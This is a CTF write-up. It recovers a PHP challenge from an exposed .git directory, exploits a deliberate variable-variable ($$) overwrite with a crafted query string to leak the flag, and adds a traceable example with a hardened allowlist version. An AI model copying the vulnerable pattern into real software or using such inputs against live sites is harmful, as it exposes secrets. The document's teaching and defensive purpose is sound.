A directory scan turns up /.git/ on the target.
Using GitHack on the exposed repository, we recover index.php.
Source code:
<?php
include 'flag.php';
//flag.php:
//<?php
//$flag = file_get_contents('/flag');

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;
Where the vulnerability is:
Both the parameter names and the values submitted via GET are attacker-controlled, and the $$ (variable variable) assignment lets us overwrite arbitrary variables in the script's scope.
$$x takes the value of $x as a variable name and creates (or overwrites) a variable with that name. $$x = $$y therefore copies the variable named by $y into the variable named by $x: for example, with ?name=test we get $x = 'name' and $y = 'test', so the assignment becomes $name = $test.
$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
Using this overwrite, we send the GET parameter handsome=flag: the second foreach then executes $handsome = $flag, copying the flag's value into $handsome. We then satisfy the if condition in the third loop (a GET key that equals the value of the flag parameter, where that value is not 'flag'), so exit($handsome) prints the flag.
/?handsome=flag&flag=kkk&kkk=111
This returns the flag.
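As an added example (not the writeup's own code), the challenge logic is wrapped in a function over explicit request arrays so the overwrite can be traced offline, beside a hardened variant that drops $$ in favour of an allowlist of the three expected names; the flag value is a constructed placeholder standing in for file_get_contents('/flag').

```php
<?php
// Added example, not the challenge's own code. The challenge logic takes explicit
// $get/$post arrays so the variable overwrite can be traced without a web server;
// the flag is a constructed sample standing in for file_get_contents('/flag').

function challenge(array $get, array $post): string {
    $flag = 'flag{constructed-sample}';
    $yds = "dog";
    $is = "cat";
    $handsome = 'yds';
    foreach ($post as $x => $y) { $$x = $y; }          // POST: name from key, value literal
    foreach ($get as $x => $y) { $$x = $$y ?? null; }  // GET: name from key, value read from
                                                       // the variable named by the value
    foreach ($get as $x => $y) {
        if (($get['flag'] ?? null) === $x && $x !== 'flag') { return $handsome; }
    }
    if (!isset($get['flag']) && !isset($post['flag'])) { return $yds; }
    if (($post['flag'] ?? null) === 'flag' || ($get['flag'] ?? null) === 'flag') { return $is; }
    return "the flag is: " . $flag;
}

// Hardened variant: script state lives in an array and only the three expected names
// may be set, directly from the request value, so a user-chosen name can never resolve
// to $flag or to any other variable in scope.
function hardened(array $get, array $post): string {
    $flag = 'flag{constructed-sample}';
    $state = ['yds' => 'dog', 'is' => 'cat', 'handsome' => 'yds'];
    foreach (array_keys($state) as $name) {
        foreach ([$post, $get] as $src) {
            if (isset($src[$name]) && is_string($src[$name])) { $state[$name] = $src[$name]; }
        }
    }
    foreach ($get as $x => $y) {
        if (($get['flag'] ?? null) === $x && $x !== 'flag') { return $state['handsome']; }
    }
    if (!isset($get['flag']) && !isset($post['flag'])) { return $state['yds']; }
    if (($post['flag'] ?? null) === 'flag' || ($get['flag'] ?? null) === 'flag') { return $state['is']; }
    return "the flag is: " . $flag;
}

// Same query string as the writeup: ?handsome=flag&flag=kkk&kkk=111 (PHP keeps the order).
$get = ['handsome' => 'flag', 'flag' => 'kkk', 'kkk' => '111'];
echo challenge($get, []), "\n";   // flag{constructed-sample}: $handsome now holds $flag
echo hardened($get, []), "\n";    // flag: just the literal string the client sent
```

Run it with `php example.php`; the second foreach in challenge() performs $handsome = $flag, then $flag = $kkk (unset, so null) and $kkk = ${'111'} (unset, so null), which is why the ?? null guard is needed to keep PHP 8 quiet about undefined variables.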